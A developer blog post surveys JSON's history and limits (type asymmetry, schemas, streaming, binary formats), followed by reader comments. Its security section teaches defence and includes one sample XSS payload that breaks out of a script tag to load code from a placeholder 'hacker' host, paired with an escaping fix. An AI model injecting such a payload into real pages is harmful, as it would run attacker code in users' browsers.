DEV Community

Cover image for JSON, JSON, JSON
stereobooster
stereobooster

Posted on

JSON, JSON, JSON

All things about JSON.

Begining

JSON - born out of web platform limitation and a bit of creativity. There was XMLHttpRequest to do request to the server without the need to do full reload, but XML is "heavy" on the wire, so Douglas Crockford thought of clever trick - we can use JavaScript Object Notation and eval to pass data from the server to the client or vice versa in easy way. But it is not safe to execute arbitrary code (eval) especially if it comes from 3rd party source. So next step was to standardize it and implement a specific parser for it. Later it becomes standard for all browsers and now we can use it as JSON.parse.

limitation

Taking into account how it was born it comes with some limitations

Asymetric encoding/decoding

You know how JS tries to pretend that type errors doesn't exist and tries just coerce at any cost even if doesn't make much sense. This means that x == JSON.parse(JSON.stringify(x)) doesn't always hold true. For example:

  • Date will be turned in string representation, and after decoding it will stay a string
  • Map, WeakMap, Set, WeakSet will be turned in "{}" - it will lose contents and type
  • BigInt for a change throws TypeError: Do not know how to serialize a BigInt
  • a function will be converted to undefined
  • undefined will be converted to undefined
  • ES6 class and new function(){} will be converted into a representation of a plain object, but will lose type

Solution: One of possible solutions here is to use static type systems like TypeScript or Flow to prevent asymmetric types:

// inspired by https://github.com/tildeio/ts-std/blob/master/src/json.ts
export type JSONValue =
  | string
  | number
  | boolean
  | null
  | JSONObject
  | JSONArray;
type JSONObject = {[key: string]: JSONValue};
type JSONArray = Array<JSONValue>;

export const symetricStringify = (x: JSONValue) => JSON.stringify(x);
Enter fullscreen mode Exit fullscreen mode

Though it will not save us from TypeError: Converting circular structure to JSON, but will get to it later.

Security: script injection

If you use JSON as a way to pass data from the server to the client inside HTML, for example, the initial value for Redux store in case of server-side rendering or gon in Ruby, be aware that there a risk of script injection attack

<script>
  var data = {user_input: "</script><script src=http://hacker/script.js>"}
</script>
Enter fullscreen mode Exit fullscreen mode

Solution: escape JSON before passing it to HTML

const UNSAFE_CHARS_REGEXP = /[<>\/\u2028\u2029]/g;
// Mapping of unsafe HTML and invalid JavaScript line terminator chars to their
// Unicode char counterparts which are safe to use in JavaScript strings.
const ESCAPED_CHARS = {
  "<": "\\u003C",
  ">": "\\u003E",
  "/": "\\u002F",
  "\u2028": "\\u2028",
  "\u2029": "\\u2029"
};
const escapeUnsafeChars = unsafeChar => ESCAPED_CHARS[unsafeChar];
const escape = str => str.replace(UNSAFE_CHARS_REGEXP, escapeUnsafeChars);
export const safeStringify = (x) => escape(JSON.stringify(x));
Enter fullscreen mode Exit fullscreen mode

Side note: collection of JSON implementation vulnerabilities

Lack of schema

JSON is schemaless - it makes sense because JS is dynamically typed. But this means that you need to verify shape (types) yourself JSON.parse won't do it for you.

Solution: I wrote about this problem before - use IO validation

Side note: there are also other solutions, like JSON API, Swagger, and GraphQL.

Lack of schema and serializer/parser

Having a schema for parser can solve the issue with asymmetry for Date. If we know that we expect Date at some place we can use string representation to create JS Date out of it.

Having a schema for serializer can solve issue for BigInt, Map, WeakMap, Set, WeakSet, ES6 classes and new function(){}. We can provide specific serializer/parser for each type.

import * as t from 'io-ts'

const DateFromString = new t.Type<Date, string>(
  'DateFromString',
  (m): m is Date => m instanceof Date,
  (m, c) =>
    t.string.validate(m, c).chain(s => {
      const d = new Date(s)
      return isNaN(d.getTime()) ? t.failure(s, c) : t.success(d)
    }),
  a => a.toISOString()
)
Enter fullscreen mode Exit fullscreen mode

Side note: see also this proposal

Lack of schema and performance

Having a schema can improve the performance of parser. For example, see jitson and FAD.js

Side note: see also fast-json-stringify

Stream parser/serializer

When JSON was invented nobody thought about using it for gigabytes of data. If you want to do something like this take a look at some stream parser.

Also, you can use a JSON stream to improve UX for slow backend - see oboejs.

Beyond JSON

uneval

If you want to serialize actual JS code and preserve types, references and cyclic structures JSON will be not enough. You will need "uneval". Checkout some of those:

Other "variations to this tune":

  • LJSON - JSON extended with pure functions
  • serialize-javascript - Serialize JavaScript to a superset of JSON that includes regular expressions, dates and functions
  • arson - Efficient encoder and decoder for arbitrary objects
  • ResurrectJS preserves object behavior (prototypes) and reference circularity with a special JSON encoding
  • serializr - Serialize and deserialize complex object graphs to and from JSON and Javascript classes

As a configuration file

JSON was invented to transmit data, not for storing configuration. Yet people use it for configuration because this is an easy option.

JSON lacks comments, requires quotes around keys, prohibits coma at the end of array or dictionary, requires paired {} and []. There is no real solution for this excepts use another format, like JSON5 or YAML or TOML.

Binary data

JSON is more compact than XML, yet not the most compact. Binary formats even more effective. Checkout MessagePack.

Side note: GraphQL is not tied to JSON, so you can use MessagePack with GraphQL.

Binary data and schema

Having binary format with schema allows doing some crazy optimization, like random access or zero-copy. Check out Cap-n-Proto.

Query language

JSON (as anything JS related) is super popular, so people need to work with it more and more and started to build tools around it, like JSONPath and jq.

Did I miss something?

Leave a comment if I missed something. Thanks for reading.


Follow me on twitter and github.

Top comments (11)

Collapse
 
jamesmalvi profile image
Jaimie Malvi • Edited

Very well written article Stereobooster. : )

I love JSON and how it's easy to use. I also like to suggest few tools and article which helps lovers of JSON .

jsonformatter.org . it's all in one JSON tool.

codebeautify.org/jsonvalidator . It's json validator

codeblogmoney.com/what-is-json/

I hope this help.

Collapse
 
nalani profile image
nalani5210

JSON brings great convenience to network transmission, but when JSON data is very long, it will make people fall into tedious and complicated data node search.
Many online websites can solve this problem:)
jsonformatting.com/jsonformat

Collapse
 
tux0r profile image
tux0r

MessagePack is lovely (but hard to read as a human). Another format with less overhead are Lisp's S-expressions. 🙂

Collapse
 
stereobooster profile image
stereobooster

I'll just leave it here

s-expression

(document author: "paul@prescod.net"
  (para "This is a paragraph " (footnote "(better than the one under there)" ".")
  (para "Ha! I made you say \"underwear\"."))

JSON

["document", "author", "paul@prescod.net",
  ["para", "This is a paragraph ", ["footnote", "(better than the one under there)", "."]
  ["para", "Ha! I made you say \"underwear\"."]]

XML

<document author="paul@prescod.net">
  <para>This is a paragraph <footnote>(just a little one).</para>
  <para>Ha! I made you say "underwear".</para>
</document>
Collapse
 
erebos-manannan profile image
Erebos Manannán • Edited

I really hope you wouldn't use arrays to represent that kind of a structure, when it's clearly insane. Data structures should be designed for representing data and preventing invalid state, not looking pretty on your screen.

This is what that XML would actually translate to in JSON to have semantically similar meaning, and that would be as easy for computers to parse without errors:

{
  "author": "paul@prescod.net",
  "children": [
    {"type": "paragraph", "children": [
      {"type": "footnote", "text": "(better than the one under there)."},
    ]},
    {"type": "paragraph", "text": "Ha! I made you say \"underwear\"."}
  ]
}

Doesn't look so condensed anymore, now does it?

Also, which one of these is the easiest for a human eye to read? The XML.

Thread Thread
 
stereobooster profile image
stereobooster

I really hope you wouldn't use arrays to represent that kind of a structure, when it's clearly insane.

You know this is not an actual argument, right?

Data structures should be designed for representing data and preventing invalid state, not looking pretty on your screen.

JSON is not a data structure, this is serialisation format. Serialisation format judged on speed of serialisation/deserialisation, ability to be stream parsed, ability to do random reads, ability to encode cyclic dependencies etc.

Given example just demonstrates how s-expressions would look like in JSON. If you wonder what is real life example of usage - one is istf-spec

[
  [RULE_START, 1],
    [SELECTOR, '.foo'],
    [PROPERTY, 'color'],
    [VALUE, 'red'],
  [RULE_END],
  [PARTIAL_REF, () => [
    [RULE_START, 1],
      [SELECTOR, '.partial'],
      [PROPERTY, 'color'],
      [VALUE, 'green'],
    [RULE_END],    
  ]]
]

XML in given example is just a reference to the fact that it has roots in s-expression (this is kind of joke).

Thread Thread
 
erebos-manannan profile image
Erebos Manannán

Given example just demonstrates how s-expressions would look like in JSON.

Given example didn't exactly come with a disclaimer. It is a s-expression vs. JSON vs. XML without much context, and in that example it looks like you're trying to desperately find a way to represent the XML in two formats that really are not suitable for representing that data.

Thread Thread
 
stereobooster profile image
stereobooster

Yes it is s-expression vs. JSON vs. XML, but I didn't draw any conclusions or anything like this. This is not a post where I claim one technology is total winner. I just had a chit-chat with tux0r. I'm not sure what exactly assaulted you

Thread Thread
 
tux0r profile image
tux0r

I still prefer parentheses!

Collapse
 
codebeautify profile image
Code Beautify

Nice article.
Just in case someone needs a codebeautify.net/json/validator

Collapse
 
cyr1l profile image
cyr1l

JSON schema allows to validate JSON data: